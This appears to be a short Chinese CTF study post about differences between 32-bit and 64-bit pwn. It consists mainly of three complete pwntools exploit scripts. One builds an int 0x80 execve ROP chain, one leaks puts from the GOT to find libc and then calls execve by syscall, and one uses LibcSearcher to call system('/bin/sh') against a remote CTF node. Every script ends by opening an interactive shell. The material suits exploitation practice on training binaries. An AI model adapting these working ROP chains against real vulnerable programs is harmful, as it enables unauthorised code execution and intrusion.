主要还是要学习32位程序和64位程序函数参数的不同寄存器处理
https://tearorca.github.io/32位和64位在pwn中的不同点/
系统调用syscall
灵感来源:https://bbs.pediy.com/thread-248682.htm
使用的程序为网页中的pwn2,pwn2中有大量的gadget,不用ret2libc

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
| from pwn import *
context.log_level = 'DEBUG'
p = process('./pwn2') elf = ELF('./pwn2')
def get_addr(s): return next(elf.search(s))
p.recv()
pop_eax = 0x080bb196 pop_ecx_ebx = 0x0806eb91 pop_edx = 0x0806eb6a
int80 = 0x08049421 binsh = 0x080be408
payload = 112 * 'a' payload += p32(pop_eax) payload += p32(0xb) payload += p32(pop_ecx_ebx) payload += p32(0) payload += p32(binsh) payload += p32(pop_edx) payload += p32(0) payload += p32(int80)
p.sendline(payload) p.interactive()
|
利用syscall函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
|
from pwn import * from LibcSearcher import * import code
context.log_level = 'DEBUG'
p = process('./rop') elf = ELF('./rop')
pop_rdi = 0x4011bb puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] main = elf.symbols['main'] p.recv()
payload1 = 'a' * 18 + ''.join(map(p64, [pop_rdi, puts_got, puts_plt, main])) p.sendline(payload1)
puts_libc = u64(p.recv(6).ljust(8, '\x00')) print hex(puts_libc) p.recv()
libc = elf.libc libc_base = puts_libc - libc.symbols['puts']
pop_rax = libc_base + 0x3ee28 pop_rdi = libc_base + 0x26796 pop_rsi = libc_base + 0x2890f pop_rdx = libc_base + 0xcb16d syscall = libc_base + 0x2552b binsh = libc_base + next(libc.search('/bin/sh'))
payload2 = 'a' * 18 + ''.join(map(p64, [pop_rax, 59, pop_rdi, binsh, pop_rsi, 0, pop_rdx, 0, syscall])) p.sendline(payload2) p.interactive()
|
利用system函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41
|
from pwn import * from LibcSearcher import * import sys import code
context.log_level = 'DEBUG'
reload(sys) sys.setdefaultencoding("utf-8")
p = remote('node4.buuoj.cn', 27296) elf = ELF('rop')
padding_len = 0x28
pop_rdi = 0x400733 puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] main = elf.symbols['main'] p.recv()
payload1 = 'a' * padding_len + ''.join(map(p64, [pop_rdi, puts_got, puts_plt, main])) p.sendline(payload1)
puts_libc = u64(p.recv(6).ljust(8, '\x00')) print hex(puts_libc) p.recv()
libc=LibcSearcher('puts', puts_libc) libcbase_addr = puts_libc - libc.dump('puts') system_addr = libcbase_addr+libc.dump('system') binsh_addr = libcbase_addr+libc.dump('str_bin_sh')
payload2 = 'a' * padding_len + ''.join(map(p64, [pop_rdi, binsh_addr, system_addr])) p.sendline(payload2) p.interactive()
|